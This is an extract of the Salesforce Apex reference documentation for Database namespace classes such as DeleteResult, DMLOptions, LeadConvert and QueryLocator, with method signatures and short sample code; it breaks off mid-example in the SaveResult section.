Contains information about a deleted record.
DeleteResult Class
Represents the result of a delete DML operation returned by the Database.delete method.
DMLOptions Class
Enables you to set options related to DML operations.
DmlOptions.AssignmentRuleHeader Class
Enables setting assignment rule options.
DmlOptions.EmailHeader Class
Enables setting email options.
EmptyRecycleBinResult Class
The result of the emptyRecycleBin DML operation returned by the Database.emptyRecycleBin method.
Error Class
Contains information about an error that occurred during a DML operation when using a Database method.
GetDeletedResult Class
Contains the deleted records retrieved for a specific sObject type and time window.
GetUpdatedResult Class
Contains the result for the Database.getUpdated method call.
1087
Reference
Batchable Interface
LeadConvert Class
Contains information used for lead conversion.
LeadConvertResult Class
The result of a lead conversion.
MergeResult Class
Contains the result of a merge Database method operation.
QueryLocator Class
Represents the record set returned by Database.getQueryLocator and used with Batch Apex.
QueryLocatorIterator Class
Represents an iterator over a query locator record set.
SaveResult Class
The result of an insert or update DML operation returned by a Database method.
UndeleteResult Class
The result of an undelete DML operation returned by the Database.undelete method.
UpsertResult Class
The result of an upsert DML operation returned by the Database.upsert method.
Batchable Interface
The class that implements this interface can be executed as a batch Apex job.
Namespace
Database
SEE ALSO:
Using Batch Apex
Batchable Methods
The following are methods for Batchable.
IN THIS SECTION:
execute(Database.BatchableContext, List<sObject>)
Gets invoked when the batch job executes and operates on one batch of records. Contains or calls the main execution logic for the
batch job.
finish(Database.BatchableContext)
Gets invoked when the batch job finishes. Place any clean up code in this method.
start(Database.BatchableContext)
Gets invoked when the batch job starts. Returns the record set as an iterable that will be batched for execution.
start(Database.BatchableContext)
Gets invoked when the batch job starts. Returns the record set as a QueryLocator object that will be batched for execution.
1088
Reference
Batchable Interface
execute(Database.BatchableContext, List<sObject>)
Gets invoked when the batch job executes and operates on one batch of records. Contains or calls the main execution logic for the batch
job.
Signature
public Void execute(Database.BatchableContext context, List<sObject> scope)
Parameters
context
Type: Database.BatchableContext
Contains the job ID.
scope
Type: List<sObject>
Contains the batch of records to process.
Return Value
Type: Void
finish(Database.BatchableContext)
Gets invoked when the batch job finishes. Place any clean up code in this method.
Signature
public Void finish(Database.BatchableContext context)
Parameters
context
Type: Database.BatchableContext
Contains the job ID.
Return Value
Type: Void
start(Database.BatchableContext)
Gets invoked when the batch job starts. Returns the record set as an iterable that will be batched for execution.
Signature
public System.Iterable start(Database.BatchableContext context)
1089
Reference
BatchableContext Interface
Parameters
context
Type: Database.BatchableContext
Contains the job ID.
Return Value
Type: System.Iterable
start(Database.BatchableContext)
Gets invoked when the batch job starts. Returns the record set as a QueryLocator object that will be batched for execution.
Signature
public Database.QueryLocator start(Database.BatchableContext context)
Parameters
context
Type: Database.BatchableContext
Contains the job ID.
Return Value
Type: Database.QueryLocator
BatchableContext Interface
Represents the parameter type of a batch job method and contains the batch job ID. This interface is implemented internally by Apex.
Namespace
Database
SEE ALSO:
Batchable Interface
BatchableContext Methods
The following are methods for BatchableContext.
IN THIS SECTION:
getChildJobId()
Returns the ID of the current batch job chunk that is being processed.
1090
Reference
DeletedRecord Class
getJobId()
Returns the batch job ID.
getChildJobId()
Returns the ID of the current batch job chunk that is being processed.
Signature
public Id getChildJobId()
Return Value
Type: ID
getJobId()
Returns the batch job ID.
Signature
public Id getJobId()
Return Value
Type: ID
DeletedRecord Class
Contains information about a deleted record.
Namespace
Database
Usage
The getDeletedRecords method of the Database.GetDeletedResult class returns a list of
Database.DeletedRecord objects. Use the methods in the Database.DeletedRecord class to retrieve details about
each deleted record.
DeletedRecord Methods
The following are methods for DeletedRecord. All are instance methods.
IN THIS SECTION:
getDeletedDate()
Returns the deleted date of this record.
1091
Reference
DeleteResult Class
getId()
Returns the ID of a record deleted within the time window specified in the Database.getDeleted method.
getDeletedDate()
Returns the deleted date of this record.
Signature
public Date getDeletedDate()
Return Value
Type: Date
getId()
Returns the ID of a record deleted within the time window specified in the Database.getDeleted method.
Signature
public Id getId()
Return Value
Type: ID
DeleteResult Class
Represents the result of a delete DML operation returned by the Database.delete method.
Namespace
Database
Usage
An array of Database.DeleteResult objects is returned with the delete database method. Each element in the DeleteResult
array corresponds to the sObject array passed as the sObject[] parameter in the delete Database method; that is, the first
element in the DeleteResult array matches the first element passed in the sObject array, the second element corresponds with the second
element, and so on. If only one sObject is passed in, the DeleteResult array contains a single element.
Example
The following example shows how to obtain and iterate through the returned Database.DeleteResult objects. It deletes some
queried accounts using Database.delete with a false second parameter to allow partial processing of records on failure. Next, it
1092
Reference
DeleteResult Class
iterates through the results to determine whether the operation was successful or not for each record. It writes the ID of every record
that was processed successfully to the debug log, or error messages and fields of the failed records.
// Query the accounts to delete
Account[] accts = [SELECT Id from Account WHERE Name LIKE 'Acme%'];
// Delete the accounts
Database.DeleteResult[] drList = Database.delete(accts, false);
// Iterate through each returned result
for(Database.DeleteResult dr : drList) {
if (dr.isSuccess()) {
// Operation was successful, so get the ID of the record that was processed
System.debug('Successfully deleted account with ID: ' + dr.getId());
}
else {
// Operation failed, so get all errors
for(Database.Error err : dr.getErrors()) {
System.debug('The following error has occurred.');
System.debug(err.getStatusCode() + ': ' + err.getMessage());
System.debug('Account fields that affected this error: ' + err.getFields());
}
}
}
DeleteResult Methods
The following are methods for DeleteResult. All are instance methods.
IN THIS SECTION:
getErrors()
If an error occurred, returns an array of one or more database error objects providing the error code and description.
getId()
Returns the ID of the sObject you were trying to delete.
isSuccess()
A Boolean value that is set to true if the DML operation was successful for this object, false otherwise.
getErrors()
If an error occurred, returns an array of one or more database error objects providing the error code and description.
Signature
public Database.Error[] getErrors()
Return Value
Type: Database.Error[]
1093
Reference
DMLOptions Class
getId()
Returns the ID of the sObject you were trying to delete.
Signature
public ID getId()
Return Value
Type: ID
Usage
If this field contains a value, the object was successfully deleted. If this field is empty, the operation was not successful for that object.
isSuccess()
A Boolean value that is set to true if the DML operation was successful for this object, false otherwise.
Signature
public Boolean isSuccess()
Return Value
Type: Boolean
DMLOptions Class
Enables you to set options related to DML operations.
Namespace
Database
Usage
Database.DMLOptions is only available for Apex saved against API versions 15.0 and higher. DMLOptions settings take effect
only for record operations performed using Apex DML and not through the Salesforce user interface.
DmlOptions Properties
The following are properties for DmlOptions.
IN THIS SECTION:
allowFieldTruncation
Specifies the truncation behavior of large strings.
1094
Reference
DMLOptions Class
assignmentRuleHeader
Specifies the assignment rule to be used when creating a case or lead.
emailHeader
Specifies additional information regarding the automatic email that gets sent when an events occurs.
localeOptions
Specifies the language of any labels that are returned by Apex.
optAllOrNone
Specifies whether the operation allows for partial success.
allowFieldTruncation
Specifies the truncation behavior of large strings.
Signature
public Boolean allowFieldTruncation {get; set;}
Property Value
Type: Boolean
Usage
In Apex saved against API versions previous to 15.0, if you specify a value for a string and that value is too large, the value is truncated.
For API version 15.0 and later, if a value is specified that is too large, the operation fails and an error message is returned. The
allowFieldTruncation property allows you to specify that the previous behavior, truncation, be used instead of the new
behavior in Apex saved against API versions 15.0 and later.
assignmentRuleHeader
Specifies the assignment rule to be used when creating a case or lead.
Signature
public Database.DmlOptions.Assignmentruleheader assignmentRuleHeader {get; set;}
Property Value
Type: Database.DMLOptions.AssignmentRuleHeader
Usage
Note: The Database.DMLOptions object supports assignment rules for cases and leads, but not for accounts or territory management.
emailHeader
Specifies additional information regarding the automatic email that gets sent when an events occurs.
1095
Reference
DMLOptions Class
Signature
public Database.DmlOptions.EmailHeader emailHeader {get; set;}
Property Value
Type: Database.DMLOptions.EmailHeader
Usage
The Salesforce user interface allows you to specify whether or not to send an email when the following events occur.
Creation of a new case or task
Conversion of a case email to a contact
New user email notification
Lead queue email notification
Password reset
In Apex saved against API version 15.0 or later, the Database.DMLOptions emailHeader property enables you to specify additional
information regarding the email that gets sent when one of the events occurs because of the code's execution.
localeOptions
Specifies the language of any labels that are returned by Apex.
Signature
public Database.DmlOptions.LocaleOptions localeOptions {get; set;}
Property Value
Type: Database.DMLOptions.LocaleOptions
Usage
The value must be a valid user locale (language and country), such as de_DE or en_GB. The value is a String, 2-5 characters long. The
first two characters are always an ISO language code, for example 'fr' or 'en.' If the value is further qualified by a country, then the string
also has an underscore (_) and another ISO country code, for example 'US' or 'UK.' For example, the string for the United States is 'en_US',
and the string for French Canadian is 'fr_CA.'
For a list of the languages that Salesforce supports, see What languages does Salesforce support? in the Salesforce online help.
optAllOrNone
Specifies whether the operation allows for partial success.
Signature
public Boolean optAllOrNone {get; set;}
1096
Reference
DmlOptions.AssignmentRuleHeader Class
Property Value
Type: Boolean
Usage
If optAllOrNone is set to true, all changes are rolled back if any record causes errors. The default for this property is false and
successfully processed records are committed while records with errors aren't.
This property is available in Apex saved against Salesforce API version 20.0 and later.
DmlOptions.AssignmentRuleHeader Class
Enables setting assignment rule options.
Namespace
Database
Example
The following example uses the useDefaultRule option:
Database.DMLOptions dmo = new Database.DMLOptions();
dmo.assignmentRuleHeader.useDefaultRule= true;
Lead l = new Lead(company='ABC', lastname='Smith');
l.setOptions(dmo);
insert l;
DmlOptions.AssignmentRuleHeader Properties
The following are properties for DmlOptions.AssignmentRuleHeader.
IN THIS SECTION:
assignmentRuleID
Specifies the ID of a specific assignment rule to run for the case or lead. The assignment rule can be active or inactive.
useDefaultRule
If specified as true for a case or lead, the system uses the default (active) assignment rule for the case or lead. If specified, do not
specify an assignmentRuleId.
1097
Reference
DmlOptions.EmailHeader Class
assignmentRuleID
Specifies the ID of a specific assignment rule to run for the case or lead. The assignment rule can be active or inactive.
Signature
public Id assignmentRuleID {get; set;}
Property Value
Type: ID
Usage
The ID can be retrieved by querying the AssignmentRule sObject. If specified, do not specify useDefaultRule.
If the value is not in the correct ID format (15-character or 18-character Salesforce ID), the call fails and an exception is returned.
Note: For the Case sObject, the assignmentRuleID DML option can be set only from the API and is ignored when set from
Apex. For example, you can set the assignmentRuleID for an active or inactive rule from the executeanonymous()
API call, but not from the Developer Console. This doesnt apply to leadsthe assignmentRuleID DML option can be set
for leads from both Apex and the API.
useDefaultRule
If specified as true for a case or lead, the system uses the default (active) assignment rule for the case or lead. If specified, do not specify
an assignmentRuleId.
Signature
public Boolean useDefaultRule {get; set;}
Property Value
Type: Boolean
Usage
If there are no assignment rules in the organization, in API version 29.0 and earlier, creating a case or lead with useDefaultRule
set to true results in the case or lead being assigned to the predefined default owner. In API version 30.0 and later, the case or lead is
unassigned and doesn't get assigned to the default owner.
DmlOptions.EmailHeader Class
Enables setting email options.
Namespace
Database
1098
Reference
DmlOptions.EmailHeader Class
Usage
Even though auto-sent emails can be triggered by actions in the Salesforce user interface, the DMLOptions settings for emailHeader
take effect only for DML operations carried out in Apex code.
Example
In the following example, the triggerAutoResponseEmail option is specified:
Account a = new Account(name='Acme Plumbing');
insert a;
Contact c = new Contact(email='[email protected]', firstname='Joe',lastname='Plumber',
accountid=a.id);
insert c;
Database.DMLOptions dlo = new Database.DMLOptions();
dlo.EmailHeader.triggerAutoResponseEmail = true;
Case ca = new Case(subject='Plumbing Problems', contactid=c.id);
database.insert(ca, dlo);
DmlOptions.EmailHeader Properties
The following are properties for DmlOptions.EmailHeader.
IN THIS SECTION:
triggerAutoResponseEmail
Indicates whether to trigger auto-response rules (true) or not (false), for leads and cases.
triggerOtherEmail
Indicates whether to trigger email outside the organization (true) or not (false).
triggerUserEmail
Indicates whether to trigger email that is sent to users in the organization (true) or not (false).
triggerAutoResponseEmail
Indicates whether to trigger auto-response rules (true) or not (false), for leads and cases.
Signature
public Boolean triggerAutoResponseEmail {get; set;}
Property Value
Type: Boolean
1099
Reference
DmlOptions.EmailHeader Class
Usage
This email can be automatically triggered by a number of events, for example creating a case or resetting a user password. If this value
is set to true, when a case is created, if there is an email address for the contact specified in ContactID, the email is sent to that
address. If not, the email is sent to the address specified in SuppliedEmail
triggerOtherEmail
Indicates whether to trigger email outside the organization (true) or not (false).
Signature
public Boolean triggerOtherEmail {get; set;}
Property Value
Type: Boolean
Usage
This email can be automatically triggered by creating, editing, or deleting a contact for a case.
Note: Email sent through Apex because of a group event includes additional behaviors. A group event is an event for which
IsGroupEvent is true. The EventAttendee object tracks the users, leads, or contacts that are invited to a group event.
Note the following behaviors for group event email sent through Apex:
Sending a group event invitation to a lead or contact respects the triggerOtherEmail option
Email sent when updating or deleting a group event also respects the triggerUserEmail and triggerOtherEmail
options, as appropriate
triggerUserEmail
Indicates whether to trigger email that is sent to users in the organization (true) or not (false).
Signature
public Boolean triggerUserEmail {get; set;}
Property Value
Type: Boolean
Usage
This email can be automatically triggered by a number of events; resetting a password, creating a new user, or creating or modifying a
task.
Note: Adding comments to a case in Apex doesnt trigger email to users in the organization even if triggerUserEmail is
set to true.
1100
Reference
EmptyRecycleBinResult Class
Note: Email sent through Apex because of a group event includes additional behaviors. A group event is an event for which
IsGroupEvent is true. The EventAttendee object tracks the users, leads, or contacts that are invited to a group event. Note
the following behaviors for group event email sent through Apex:
Sending a group event invitation to a user respects the triggerUserEmail option
Email sent when updating or deleting a group event also respects the triggerUserEmail and triggerOtherEmail
options, as appropriate
EmptyRecycleBinResult Class
The result of the emptyRecycleBin DML operation returned by the Database.emptyRecycleBin method.
Namespace
Database
Usage
A list of Database.EmptyRecycleBinResult objects is returned by the Database.emptyRecycleBin method. Each
object in the list corresponds to either a record ID or an sObject passed as the parameter in the Database.emptyRecycleBin
method. The first index in the EmptyRecycleBinResult list matches the first record or sObject specified in the list, the second with the
second, and so on.
EmptyRecycleBinResult Methods
The following are methods for EmptyRecycleBinResult. All are instance methods.
IN THIS SECTION:
getErrors()
If an error occurred during the delete for this record or sObject, returns a list of one or more Database.Error objects. If no errors
occurred, the returned list is empty.
getId()
Returns the ID of the record or sObject you attempted to delete.
isSuccess()
Returns true if the record or sObject was successfully removed from the Recycle Bin; otherwise false.
getErrors()
If an error occurred during the delete for this record or sObject, returns a list of one or more Database.Error objects. If no errors occurred,
the returned list is empty.
Signature
public Database.Errors[] getErrors()
1101
Reference
Error Class
Return Value
Type: Database.Errors []
getId()
Returns the ID of the record or sObject you attempted to delete.
Signature
public ID getId()
Return Value
Type: ID
isSuccess()
Returns true if the record or sObject was successfully removed from the Recycle Bin; otherwise false.
Signature
public Boolean isSuccess()
Return Value
Type: Boolean
Error Class
Contains information about an error that occurred during a DML operation when using a Database method.
Namespace
Database
Error Methods
The following are methods for Error. All are instance methods.
IN THIS SECTION:
getFields()
Returns an array of one or more field names. Identifies which fields in the object, if any, affected the error condition.
getMessage()
Returns the error message text.
getStatusCode()
Returns a code that characterizes the error.
1102
Reference
GetDeletedResult Class
getFields()
Returns an array of one or more field names. Identifies which fields in the object, if any, affected the error condition.
Signature
public String[] getFields()
Return Value
Type: String[]
getMessage()
Returns the error message text.
Signature
public String getMessage()
Return Value
Type: String
getStatusCode()
Returns a code that characterizes the error.
Signature
public StatusCode getStatusCode()
Return Value
Type: StatusCode
Usage
The full list of status codes is available in the WSDL file for your organization (see Downloading Salesforce WSDLs and Client Authentication
Certificates in the Salesforce online help.)
GetDeletedResult Class
Contains the deleted records retrieved for a specific sObject type and time window.
Namespace
Database
1103
Reference
GetDeletedResult Class
Usage
The Database.getDeleted method returns the deleted record information as a Database.GetDeletedResult object.
GetDeletedResult Methods
The following are methods for GetDeletedResult. All are instance methods.
IN THIS SECTION:
getDeletedRecords()
Returns a list of deleted records for the time window specified in the Database.getDeleted method call.
getEarliestDateAvailable()
Returns the date in Coordinated Universal Time (UTC) of the earliest physically deleted object for the sObject type specified in
Database.getDeleted.
getLatestDateCovered()
Returns the date in Coordinated Universal Time (UTC) of the last date covered in the Database.getDeleted call.
getDeletedRecords()
Returns a list of deleted records for the time window specified in the Database.getDeleted method call.
Signature
public List<Database.DeletedRecord> getDeletedRecords()
Return Value
Type: List<Database.DeletedRecord>
getEarliestDateAvailable()
Returns the date in Coordinated Universal Time (UTC) of the earliest physically deleted object for the sObject type specified in
Database.getDeleted.
Signature
public Date getEarliestDateAvailable()
Return Value
Type: Date
getLatestDateCovered()
Returns the date in Coordinated Universal Time (UTC) of the last date covered in the Database.getDeleted call.
Signature
public Date getLatestDateCovered()
1104
Reference
GetUpdatedResult Class
Return Value
Type: Date
Usage
If there is a value, it is less than or equal to the endDate argument of Database.getDeleted. A value here indicates that, for
safety, you should use this value for the startDate of your next call to capture the changes that started after this date but didnt
complete before endDate and were, therefore, not returned in the previous call.
GetUpdatedResult Class
Contains the result for the Database.getUpdated method call.
Namespace
Database
Usage
Use the methods in this class to obtain detailed information about the updated records returned by Database.getUpdated for
a specific time window.
GetUpdatedResult Methods
The following are methods for GetUpdatedResult. All are instance methods.
IN THIS SECTION:
getIds()
Returns the IDs of records updated within the time window specified in the Database.getUpdated method.
getLatestDateCovered()
Returns the date in Coordinated Universal Time (UTC) of the last date covered in the Database.getUpdated call.
getIds()
Returns the IDs of records updated within the time window specified in the Database.getUpdated method.
Signature
public List<Id> getIds()
Return Value
Type: List<ID>
getLatestDateCovered()
Returns the date in Coordinated Universal Time (UTC) of the last date covered in the Database.getUpdated call.
1105
Reference
LeadConvert Class
Signature
public Date getLatestDateCovered()
Return Value
Type: Date
LeadConvert Class
Contains information used for lead conversion.
Namespace
Database
Usage
The convertLead Database method converts a lead into an account and contact, as well as (optionally) an opportunity. The
convertLead takes an instance of the Database.LeadConvert class as a parameter. Create an instance of this class and set
the information required for conversion, such as setting the lead, and destination account and contact.
Example
This example shows how to use the Database.convertLead method to convert a lead. It inserts a new lead, creates a
LeadConvert object, sets its status to converted, then passes it to the Database.convertLead method. Finally, it verifies
that the conversion was successful.
Lead myLead = new Lead(LastName = 'Fry', Company='Fry And Sons');
insert myLead;
Database.LeadConvert lc = new Database.LeadConvert();
lc.setLeadId(myLead.id);
LeadStatus convertStatus = [SELECT Id, MasterLabel FROM LeadStatus WHERE IsConverted=true
LIMIT 1];
lc.setConvertedStatus(convertStatus.MasterLabel);
Database.LeadConvertResult lcr = Database.convertLead(lc);
System.assert(lcr.isSuccess());
IN THIS SECTION:
LeadConvert Constructors
LeadConvert Methods
LeadConvert Constructors
The following are constructors for LeadConvert.
1106
Reference
LeadConvert Class
IN THIS SECTION:
LeadConvert()
Creates a new instance of the Database.LeadConvert class.
LeadConvert()
Creates a new instance of the Database.LeadConvert class.
Signature
public LeadConvert()
LeadConvert Methods
The following are methods for LeadConvert. All are instance methods.
IN THIS SECTION:
getAccountId()
Gets the ID of the account into which the lead will be merged.
getContactId()
Gets the ID of the contact into which the lead will be merged.
getConvertedStatus()
Gets the lead status value for a converted lead.
getLeadID()
Gets the ID of the lead to convert.
getOpportunityName()
Gets the name of the opportunity to create.
getOwnerID()
Gets the ID of the person to own any newly created account, contact, and opportunity.
isDoNotCreateOpportunity()
Indicates whether an Opportunity is created during lead conversion (false, the default) or not (true).
isOverWriteLeadSource()
Indicates whether the LeadSource field on the target Contact object is overwritten with the contents of the LeadSource
field in the source Lead object (true), or not (false, the default).
isSendNotificationEmail()
Indicates whether a notification email is sent to the owner specified by setOwnerId (true) or not (false, the default).
setAccountId(ID)
Sets the ID of the account into which the lead will be merged. This value is required only when updating an existing account, including
person accounts. Otherwise, if setAccountID is specified, a new account is created.
setContactId(ID)
Sets the ID of the contact into which the lead will be merged (this contact must be associated with the account specified with
setAccountId, and setAccountId must be specified). This value is required only when updating an existing contact.
1107
Reference
LeadConvert Class
setConvertedStatus(String)
Sets the lead status value for a converted lead. This field is required.
setDoNotCreateOpportunity(Boolean)
Specifies whether to create an opportunity during lead conversion. The default value is false: opportunities are created by default.
Set this flag to true only if you do not want to create an opportunity from the lead.
setLeadId(ID)
Sets the ID of the lead to convert. This field is required.
setOpportunityName(String)
Sets the name of the opportunity to create. If no name is specified, this value defaults to the company name of the lead.
setOverwriteLeadSource(Boolean)
Specifies whether to overwrite the LeadSource field on the target contact object with the contents of the LeadSource field
in the source lead object. The default value is false, to not overwrite the field. If you specify this as true, you must also specify
setContactId for the target contact.
setOwnerId(ID)
Specifies the ID of the person to own any newly created account, contact, and opportunity. If the application does not specify this
value, the owner of the new object will be the owner of the lead.
setSendNotificationEmail(Boolean)
Specifies whether to send a notification email to the owner specified by setOwnerId. The default value is false, that is, to not
send email.
getAccountId()
Gets the ID of the account into which the lead will be merged.
Signature
public ID getAccountId()
Return Value
Type: ID
getContactId()
Gets the ID of the contact into which the lead will be merged.
Signature
public ID getContactId()
Return Value
Type: ID
getConvertedStatus()
Gets the lead status value for a converted lead.
1108
Reference
LeadConvert Class
Signature
public String getConvertedStatus()
Return Value
Type: String
getLeadID()
Gets the ID of the lead to convert.
Signature
public ID getLeadID()
Return Value
Type: ID
getOpportunityName()
Gets the name of the opportunity to create.
Signature
public String getOpportunityName()
Return Value
Type: String
getOwnerID()
Gets the ID of the person to own any newly created account, contact, and opportunity.
Signature
public ID getOwnerID()
Return Value
Type: ID
isDoNotCreateOpportunity()
Indicates whether an Opportunity is created during lead conversion (false, the default) or not (true).
Signature
public Boolean isDoNotCreateOpportunity()
1109
Reference
LeadConvert Class
Return Value
Type: Boolean
isOverWriteLeadSource()
Indicates whether the LeadSource field on the target Contact object is overwritten with the contents of the LeadSource field
in the source Lead object (true), or not (false, the default).
Signature
public Boolean isOverWriteLeadSource()
Return Value
Type: Boolean
isSendNotificationEmail()
Indicates whether a notification email is sent to the owner specified by setOwnerId (true) or not (false, the default).
Signature
public Boolean isSendNotificationEmail()
Return Value
Type: Boolean
setAccountId(ID)
Sets the ID of the account into which the lead will be merged. This value is required only when updating an existing account, including
person accounts. Otherwise, if setAccountID is specified, a new account is created.
Signature
public Void setAccountId(ID accountID)
Parameters
accountID
Type: ID
Return Value
Type: Void
setContactId(ID)
Sets the ID of the contact into which the lead will be merged (this contact must be associated with the account specified with
setAccountId, and setAccountId must be specified). This value is required only when updating an existing contact.
1110
Reference
LeadConvert Class
Signature
public Void setContactId(ID contactID)
Parameters
contactID
Type: ID
Return Value
Type: Void
Usage
If setContactID is specified, then the application creates a new contact that is implicitly associated with the account. The contact
name and other existing data are not overwritten (unless setOverwriteLeadSource is set to true, in which case only the
LeadSource field is overwritten).
Important: If you are converting a lead into a person account, do not specify setContactId or an error will result. Specify
only setAccountId of the person account.
setConvertedStatus(String)
Sets the lead status value for a converted lead. This field is required.
Signature
public Void setConvertedStatus(String Status)
Parameters
Status
Type: String
Return Value
Type: Void
setDoNotCreateOpportunity(Boolean)
Specifies whether to create an opportunity during lead conversion. The default value is false: opportunities are created by default.
Set this flag to true only if you do not want to create an opportunity from the lead.
Signature
public Void setDoNotCreateOpportunity(Boolean createOpportunity)
Parameters
createOpportunity
Type: Boolean
1111
Reference
LeadConvert Class
Return Value
Type: Void
setLeadId(ID)
Sets the ID of the lead to convert. This field is required.
Signature
public Void setLeadId(ID leadID)
Parameters
leadID
Type: ID
Return Value
Type: Void
setOpportunityName(String)
Sets the name of the opportunity to create. If no name is specified, this value defaults to the company name of the lead.
Signature
public Void setOpportunityName(String OppName)
Parameters
OppName
Type: String
Return Value
Type: Void
Usage
The maximum length of this field is 80 characters.
If setDoNotCreateOpportunity is true, no Opportunity is created and this field must be left blank; otherwise, an error is
returned.
setOverwriteLeadSource(Boolean)
Specifies whether to overwrite the LeadSource field on the target contact object with the contents of the LeadSource field in
the source lead object. The default value is false, to not overwrite the field. If you specify this as true, you must also specify
setContactId for the target contact.
1112
Reference
LeadConvert Class
Signature
public Void setOverwriteLeadSource(Boolean overwriteLeadSource)
Parameters
overwriteLeadSource
Type: Boolean
Return Value
Type: Void
setOwnerId(ID)
Specifies the ID of the person to own any newly created account, contact, and opportunity. If the application does not specify this value,
the owner of the new object will be the owner of the lead.
Signature
public Void setOwnerId(ID ownerID)
Parameters
ownerID
Type: ID
Return Value
Type: Void
Usage
This method is not applicable when merging with existing objectsif setOwnerId is specified, the ownerId field is not overwritten
in an existing account or contact.
setSendNotificationEmail(Boolean)
Specifies whether to send a notification email to the owner specified by setOwnerId. The default value is false, that is, to not
send email.
Signature
public Void setSendNotificationEmail(Boolean sendEmail)
Parameters
sendEmail
Type: Boolean
1113
Reference
LeadConvertResult Class
Return Value
Type: Void
LeadConvertResult Class
The result of a lead conversion.
Namespace
Database
Usage
An array of LeadConvertResult objects is returned with the convertLead Database method. Each element in the LeadConvertResult
array corresponds to the sObject array passed as the SObject[] parameter in the convertLead Database method, that is, the
first element in the LeadConvertResult array matches the first element passed in the SObject array, the second element corresponds to
the second element, and so on. If only one sObject is passed in, the LeadConvertResult array contains a single element.
LeadConvertResult Methods
The following are methods for LeadConvertResult. All are instance methods.
IN THIS SECTION:
getAccountId()
The ID of the new account (if a new account was specified) or the ID of the account specified when convertLead was invoked.
getContactId()
The ID of the new contact (if a new contact was specified) or the ID of the contact specified when convertLead was invoked.
getErrors()
If an error occurred, an array of one or more database error objects providing the error code and description.
getLeadId()
The ID of the converted lead.
getOpportunityId()
The ID of the new opportunity, if one was created when convertLead was invoked.
isSuccess()
A Boolean value that is set to true if the DML operation was successful for this object, false otherwise
getAccountId()
The ID of the new account (if a new account was specified) or the ID of the account specified when convertLead was invoked.
Signature
public ID getAccountId()
1114
Reference
LeadConvertResult Class
Return Value
Type: ID
getContactId()
The ID of the new contact (if a new contact was specified) or the ID of the contact specified when convertLead was invoked.
Signature
public ID getContactId()
Return Value
Type: ID
getErrors()
If an error occurred, an array of one or more database error objects providing the error code and description.
Signature
public Database.Error[] getErrors()
Return Value
Type: Database.Error[]
getLeadId()
The ID of the converted lead.
Signature
public ID getLeadId()
Return Value
Type: ID
getOpportunityId()
The ID of the new opportunity, if one was created when convertLead was invoked.
Signature
public ID getOpportunityId()
Return Value
Type: ID
1115
Reference
MergeResult Class
isSuccess()
A Boolean value that is set to true if the DML operation was successful for this object, false otherwise
Signature
public Boolean isSuccess()
Return Value
Type: Boolean
MergeResult Class
Contains the result of a merge Database method operation.
Namespace
Database
Usage
The Database.merge method returns a Database.MergeResult object for each merged record.
MergeResult Methods
The following are methods for MergeResult. All are instance methods.
IN THIS SECTION:
getErrors()
Returns a list of Database.Error objects representing the errors encountered, if any, during a merge operation using the
Database.merge method.
getId()
Returns the ID of the master record into which other records were merged.
getMergedRecordIds()
Returns the IDs of the records merged into the master record.
getUpdatedRelatedIds()
Returns the IDs of all related records that were reparented as a result of the merge that are viewable by the user sending the merge
call.
isSuccess()
Indicates whether the merge was successful (true) or not (false).
getErrors()
Returns a list of Database.Error objects representing the errors encountered, if any, during a merge operation using the
Database.merge method.
1116
Reference
MergeResult Class
Signature
public List<Database.Error> getErrors()
Return Value
Type: List<Database.Error>
getId()
Returns the ID of the master record into which other records were merged.
Signature
public Id getId()
Return Value
Type: ID
getMergedRecordIds()
Returns the IDs of the records merged into the master record.
Signature
public List<String> getMergedRecordIds()
Return Value
Type: List<String>
getUpdatedRelatedIds()
Returns the IDs of all related records that were reparented as a result of the merge that are viewable by the user sending the merge call.
Signature
public List<String> getUpdatedRelatedIds()
Return Value
Type: List<String>
isSuccess()
Indicates whether the merge was successful (true) or not (false).
Signature
public Boolean isSuccess()
1117
Reference
QueryLocator Class
Return Value
Type: Boolean
QueryLocator Class
Represents the record set returned by Database.getQueryLocator and used with Batch Apex.
Namespace
Database
QueryLocator Methods
The following are methods for QueryLocator. All are instance methods.
IN THIS SECTION:
getQuery()
Returns the query used to instantiate the Database.QueryLocator object. This is useful when testing the start method.
iterator()
Returns a new instance of a query locator iterator.
getQuery()
Returns the query used to instantiate the Database.QueryLocator object. This is useful when testing the start method.
Signature
public String getQuery()
Return Value
Type: String
Usage
You cannot use the FOR UPDATE keywords with a getQueryLocator query to lock a set of records. The start method automatically
locks the set of records in the batch.
Example
System.assertEquals(QLReturnedFromStart.
getQuery(),
Database.getQueryLocator([SELECT Id
FROM Account]).getQuery() );
iterator()
Returns a new instance of a query locator iterator.
1118
Reference
QueryLocatorIterator Class
Signature
public Database.QueryLocatorIterator iterator()
Return Value
Type: Database.QueryLocatorIterator
Usage
Warning: To iterate over a query locator, save the iterator instance that this method returns in a variable and then use this variable
to iterate over the collection. Calling iterator every time you want to perform an iteration can result in incorrect behavior
because each call returns a new iterator instance.
For an example, see QueryLocatorIterator Class.
QueryLocatorIterator Class
Represents an iterator over a query locator record set.
Namespace
Database
Example
This sample shows how to obtain an iterator for a query locator, which contains five accounts. This sample calls hasNext and next
to get each record in the collection.
// Get a query locator
Database.QueryLocator q = Database.getQueryLocator(
[SELECT Name FROM Account LIMIT 5]);
// Get an iterator
Database.QueryLocatorIterator it = q.iterator();
// Iterate over the records
while (it.hasNext())
{
Account a = (Account)it.next();
System.debug(a);
}
QueryLocatorIterator Methods
The following are methods for QueryLocatorIterator. All are instance methods.
IN THIS SECTION:
hasNext()
Returns true if there are one or more records remaining in the collection; otherwise, returns false.
1119
Reference
SaveResult Class
next()
Advances the iterator to the next sObject record and returns the sObject.
hasNext()
Returns true if there are one or more records remaining in the collection; otherwise, returns false.
Signature
public Boolean hasNext()
Return Value
Type: Boolean
next()
Advances the iterator to the next sObject record and returns the sObject.
Signature
public sObject next()
Return Value
Type: sObject
Usage
Because the return value is the generic sObject type, you must cast it if using a more specific type. For example:
Account a = (Account)myIterator.next();
Example
Account a = (Account)myIterator.next();
SaveResult Class
The result of an insert or update DML operation returned by a Database method.
Namespace
Database
Usage
An array of SaveResult objects is returned with the insert and update database methods. Each element in the SaveResult array
corresponds to the sObject array passed as the sObject[] parameter in the Database method, that is, the first element in the
1120
Reference
SaveResult Class
SaveResult array matches the first element passed in the sObject array, the second element corresponds with the second element, and
so on. If only one sObject is passed in, the SaveResult array contains a single element.
Example
The following example shows how to obtain and iterate through the returned Database.SaveResult objects. It inserts two
accounts using Database.insert with a false second parameter to allow partial processing of records on failure. One of the
accounts is missing the Name required field, which causes a failure. Next, it iterates through the results to determine whether the
operation was successful or not for each record. It writes the ID of every record that was processed successfully to the debug log, or error
messages and fields of the failed records. This example generates one successful operation and one failure.
// Create two accounts, one of which is missing a required field
